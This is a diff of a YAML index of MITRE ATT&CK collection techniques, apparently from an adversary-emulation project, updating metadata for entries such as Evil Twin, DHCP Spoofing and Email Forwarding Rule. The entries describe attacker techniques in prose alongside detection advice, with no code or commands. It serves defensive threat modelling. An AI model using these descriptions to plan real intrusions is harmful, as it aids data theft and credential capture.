-      modified: '2023-09-29T16:11:43.530Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Data from Cloud Storage Object
       description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
         offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -39859,10 +40341,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Netskope
       - Praetorian
       - AppOmni
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
         service. Activity originating from unexpected sources may indicate improper
@@ -39873,13 +40357,14 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Metadata'
       - 'Cloud Storage: Cloud Storage Access'
       type: attack-pattern
       id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -39920,37 +40405,11 @@ collection:
         url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1530
     atomic_tests: []
   T1074.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
-      type: attack-pattern
-      created: '2020-03-13T21:14:58.206Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.002
-        url: https://attack.mitre.org/techniques/T1074/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Remote Data Staging
       description: |-
         Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -39961,23 +40420,47 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Command: Command Execution'
       - 'File: File Access'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+      created: '2020-03-13T21:14:58.206Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/002
+        external_id: T1074.002
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:54:39.466Z'
       name: Data from Local System
       description: |
         Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -40047,7 +40530,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1005
     atomic_tests: []
   T1560.002:
@@ -40082,7 +40564,7 @@ collection:
         description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
           April 22, 2016.
         source_name: Wikipedia File Header Signatures
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T18:27:30.891Z'
       name: 'Archive Collected Data: Archive via Library'
       description: |-
         An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -40101,10 +40583,89 @@ collection:
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1560.002
     atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1602.002:
     technique:
       x_mitre_platforms:
@@ -40133,7 +40694,7 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
         description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
           by Cyber Actors. Retrieved October 2, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-17T19:50:46.948Z'
       name: Network Device Configuration Dump
       description: "Adversaries may access network configuration files to collect
         sensitive data about the device and the network. The network configuration
@@ -40163,8 +40724,6 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1560:
     technique:
@@ -40218,7 +40777,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560
     atomic_tests: []
   T1185:
@@ -40255,7 +40813,7 @@ collection:
         description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
           Retrieved May 24, 2017.
         source_name: cobaltstrike manual
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-25T18:58:15.229Z'
       name: Browser Session Hijacking
       description: |-
         Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -40283,12 +40841,10 @@ collection:
       - Administrator
       - SYSTEM
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -40325,23 +40881,23 @@ collection:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -40374,21 +40930,20 @@ collection:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -40496,12 +41051,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -40512,13 +41066,13 @@ collection:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -40532,6 +41086,7 @@ collection:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -40542,12 +41097,12 @@ collection:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1125:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.205Z'
       name: Video Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -40592,30 +41147,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1125
     atomic_tests: []
   T1213.001:
     technique:
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
-      type: attack-pattern
-      created: '2020-02-14T13:09:51.004Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.001
-        url: https://attack.mitre.org/techniques/T1213/001
-      - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
-        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
-          Retrieved April 4, 2018.
-        source_name: Atlassian Confluence Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-30T13:45:42.840Z'
       name: Confluence
       description: |2
 
@@ -40625,31 +41161,48 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
 
         User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+      created: '2020-02-14T13:09:51.004Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/001
+        external_id: T1213.001
+      - source_name: Atlassian Confluence Logging
+        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+          Retrieved April 4, 2018.
+        url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1114.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Email Forwarding Rule'
       description: "Adversaries may setup email forwarding rules to collect sensitive
         information. Adversaries may abuse email forwarding rules to monitor the activities
@@ -40682,10 +41235,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Security
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
       - Liran Ravich, CardinalOps
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -40694,16 +41249,17 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
+      - 'Cloud Service: Cloud Service Metadata'
       type: attack-pattern
       id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
       created: '2020-02-19T18:54:47.103Z'
@@ -40735,70 +41291,66 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.003
     atomic_tests: []
   T1074:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Shane Tully, @securitygypsy
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
-      created: '2017-05-31T21:30:58.938Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074
-        url: https://attack.mitre.org/techniques/T1074
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: PWC Cloud Hopper April 2017
-        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
-        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
-          April 5, 2017.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Data Staged
       description: |-
         Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
 
         In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
 
         Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Data Staged
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      - Shane Tully, @securitygypsy
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+      created: '2017-05-31T21:30:58.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074
+        external_id: T1074
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: PWC Cloud Hopper April 2017
+        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+          April 5, 2017.
+        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -40871,7 +41423,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1039:
@@ -40926,12 +41477,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1039
     atomic_tests: []
   T1114.002:
     technique:
-      modified: '2023-05-31T12:34:03.420Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Remote Email Collection'
       description: Adversaries may target an Exchange server, Office 365, or Google
         Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -40943,6 +41493,9 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
         locations, especially for privileged accounts (ex: Exchange administrator
@@ -40950,11 +41503,11 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -40971,14 +41524,11 @@ collection:
         external_id: T1114.002
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.002
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -40994,6 +41544,7 @@ collection:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
